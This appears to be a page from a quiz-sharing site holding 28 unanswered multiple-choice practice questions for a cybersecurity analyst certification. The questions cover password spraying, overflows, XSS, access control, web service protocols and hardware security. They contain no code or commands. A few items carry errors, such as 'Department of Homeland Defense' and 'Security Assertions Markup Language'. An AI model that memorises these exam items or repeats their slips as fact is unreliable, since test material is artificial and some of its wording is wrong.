Title of test:
Cysa_ 02 AIO Part2

AIO practice Part2

Adrian B
Other tests from this author

Creation Date:

Category: Computers

Number of questions: 28
Share the Test:
New CommentNuevo Comentario
No comments about this test.
Mila is executing an attack where the technique is to perform a one-time login attempt on multiple hosts on a network using the same credentials to avoid account lockouts. What is this type of attack? A. Man-in-the-middle attack B. Password spraying C. Credential stuffing D. Impersonation.
A senior cybersecurity analyst is explaining the difference between stack-based and heap-based overflow attacks to a new cybersecurity analyst. Which of the following characteristics of overflow attacks are true? (Choose two.) A. Most heap overflows are not exploitable because memory is not being overwritten. B. Heap overflows are more difficult to implement because heap is dynamically allocated. C. The stack is a type of data structure that operates on the principle of “first in, first out.” D. Stack-based overflows overwrite key areas of memory with too much data.
In the following image, an attacker sends malicious code to an unsuspecting user. The browser executes the code because it thinks it came from a trusted source. The malicious code can access cookies, session tokens, or other sensitive information retained by the browser and used with the site.Which type of attack is this ? A. Reflective cross-site scripting B. DOM cross-site scripting C. Structured cross-site scripting D. Persistent cross-site scripting.
While performing a vulnerability assessment outbrief to the customer technical staff, Julie describes a dereferencing vulnerability discovered in the systems tested. She explains that a dereferencing vulnerability is a vulnerability that A. arises when an application uses user-supplied input to access objects directly B. occurs when a system attempts to perform two or more operations at the same time C. occurs when software attempts to access a stored value in memory that does not exist D. causes detailed internal error messages to be revealed to the user.
A major factor in securing our networks is using the appropriate network architecture. Which network architecture decouples data-forwarding functions from the decision-making functions, allowing for holistic and adaptive control of how data moves around the network? A. Virtual private cloud B. Serverless C. Software defined D. Physical.
Some organizations find benefit in an architecture where applications are hosted by a third-party service and are broken up into individual functions, allowing the business to focus purely on the functions that can be invoked and scaled individually. This is the architecture used by AWS Lambda and Microsoft Azure Functions. Which architecture does this describe? A. Virtual private cloud B. Serverless C. Software defined D. Physical.
Which of the following technologies allows multiple applications to execute in isolated user spaces, share the same operating system kernel, and run on various types of infrastructure without needing to adjust for each? A. Containerization B. Virtualization C. Hypervisor D. Virtual desktop infrastructure.
Many organizations operate based on the thought that assigning privileged access is an all-or-nothing proposition, but it doesn’t have to be that way. Which of the following techniques/principles address this issue to help organizations limit overuse of privileges? (Choose two.) A. Least privilege B. Multifactor authentication C. Federated access control D. Role-based access control.
Access control methods are increasingly critical to thwarting attackers’ efforts to gain a foothold into your system and/or network. One method typically provides a very granular ability because it can filter access based on more factors, including username, role, organization, security clearance, time of access, location of data, current threat level, creation date, resource owner, filename, and data sensitivity. Which of the following access control methods provides this granularity? A. Role based B. Attribute based C. Mandatory D. Discretionary.
In an effort to close the gap between attackers’ advantages and defenders’ disadvantages, organizations such as the National Security Agency, Department of Homeland Defense, and Defense Advanced Research Projects Agency have been developing active cyber defenses. One concept spawned by this effort is a constantly evolving attack surface, such as deploying false endpoint decoys, servers, and devices. Additionally, the approach includes constantly changing the services, IP addresses, and ports being used. What is this approach known as? A. Containerization B. Moving target defense C. Software-defined networking D. Cyber threat hunting.
Which of the following activities is not a standard part of digital certificate management activities? A. Dynamically selecting a certificate hash algorithm B. Acquiring certificates from the certificate authority C. Reporting compromised certificates to the Revocation Authority D. Protecting private keys.
Garth is developing a customer solution that needs a secure method to connect two sites to share resources and also a secure method for employees to perform remote work. Which protocols support the solution needed to meet the customer requirements? (Choose two.) A. SSL B. SSH C. L2TP/IPSec D. OpenVPN.
Troy has been tasked with ensuring cybersecurity is integrated into the development of a new web application from the beginning. Troy has discovered a trove of useful application security resources from a popular organization. What is the name of this organization? A. SysAdmin, Audit, Network, and Security Institute B. National Institute of Standards and Technology C. Center for Internet Security D. Open Web Application Security Project.
Software is engineered to separate processing, data management, and presentation functions into a client/server n-tier architecture. Which of the following statements is true regarding software assurance in an n-tier architecture? A. It is more difficult to secure software because each tier handles data differently. B. Securing software is less difficult because security is distributed among the different tiers. C. There is no difference because the software assurance standards apply the same to all architectures. D. From a software assurance perspective, each tier is independent and therefore doesn’t affect the others.
Robert is auditing a client network and specifically confirming the system enforces the use of complex and long passwords, encrypts passwords both at rest and in transit, disables login after a set number of failed login attempts, and reduces the ability to enumerate username/password by displaying a standard failed login response such as “invalid username and/or password.” Robert is auditing the network specifically for which of the following top weaknesses? A. Injection flaws B. Sensitive data exposure C. Broken access control D. Broken authentication.
Debbie is integrating a standard for exchanging authentication and authorization identities between security domains using an XML-based protocol to pass information using security tokens. Debbie is implementing which standard? A. Simple Object Access Protocol B. Security Assertions Markup Language C. Representational State Transfer D. Microservices.
Andrea needs to set up a protocol to interchange data between web service applications. The requirements state an XML-based solution that is platform independent and works on the HTTP protocol. Which of the following meets the requirements for Andrea’s project? A. Simple Object Access Protocol B. Security Assertions Markup Language C. Representational State Transfer D. Microservices.
Which architectural style, among the most commonly used in web services, is used in a client/server architecture and utilizes a uniform and predefined set of stateless operations to provide interoperability on the Web? A. Simple Object Access Protocol B. Security Assertions Markup Language C. Representational State Transfer D. Microservices.
Jerry has been assigned the task of breaking up a huge monolithic application into a collection of small, modular services capable of being deployed independently but loosely coupled so they can still work together. Which architectural style meets Jerry’s needs? A. Simple Object Access Protocol B. Security Assertions Markup Language C. Representational State Transfer D. Microservices.
IBM has developed a type of one-time programmable memory that can be modified once to either disable access to certain functionality on a chip or prevent reverting back to a previous version of firmware. What is this called? A. Atomic execution B. Trusted firmware updates C. eFuse D. Anti-tamper.
The secure boot feature of UEFI is self-contained and inflexible, stopping the platform from booting if a signature is invalid. When this is not practical, there is an alternative, more flexible solution that does not stop the platform from booting but does compute and record the hash of the object so it can be retrieved later to find out what objects were encountered. What is this alternative approach known as? A. Trusted Platform Module B. Trusted firmware updates C. Hardware security module D. Measured boot and attestation.
What is the technology called that protects against software-based attacks by using hardware to create an environment for applications to be run and protected from all other software on the system, thus preventing the success of malicious software attacks? A. Secure boot B. Trusted execution C. eFuse D. Measured boot and attestation.
The Department of Defense is implementing dataat- rest encryption to the maximum extent possible, but they mostly rely on IT and program managers to implement this requirement across their portfolios. The DoD could mandate use of existing technology that automatically, without user interaction, continuously encrypts data on storage devices. This technology, which uses a unique and random data encryption key, is known as what? A. Bus encryption B. Full disk encryption C. Endpoint encryption D. Self-encrypting drives.
Daniel is working on a project and needs a solution that can provide quick, safe, and secure data transactions and verification. This solution should use specialized hardware that is well tested and certified, utilizes a security-oriented operating system, separates business logic from cryptologic calls, and is able to store and manage cryptographic keys to prevent attacks. Daniel’s project must be able to add this technology to existing systems. Which of the following meets Daniel’s criteria? A. Trusted Platform Module B. Unified Extensible Firmware Interface C. Hardware security module D. eFuse.
A new system design specification requires the hardware to allow programmers to designate special regions in memory to be encrypted and private for a given process. These regions must be dynamically decrypted by the CPU while in use, preventing any unauthorized process, including the operating system or hypervisor, from accessing plaintext stored there. Which of the following meets this design specification requirement? A. Hardware security module B. Processor security extensions C. Trusted Platform Module D. Measured boot and attestation.
Which of the following is not a characteristic of hardware root of trust? A. Contains the keys used for cryptographic functions B. Enables a secure boot process C. Prevents interruption and interference for sections of software D. Secure by design.
What category of technology is designed to address previously inherent security weaknesses in hardware solutions and includes hardware encryption to keep everything but security-related processes from accessing certain protected parts of hardware and to protect data in use? A. eFuse technology B. Measured boot and attestation C. Bus encryption D. Secure processing.
Which type of environment only runs code that has been appropriately authorized and checked by other authorized code? This requires a secure boot feature to check the integrity and authenticity of all operating system components, and it ensures that no one has tampered with the operating system’s code when the device is powered off. A. Trusted execution B. Secure boot C. eFuse D. Measured boot and attestation.
Report abuse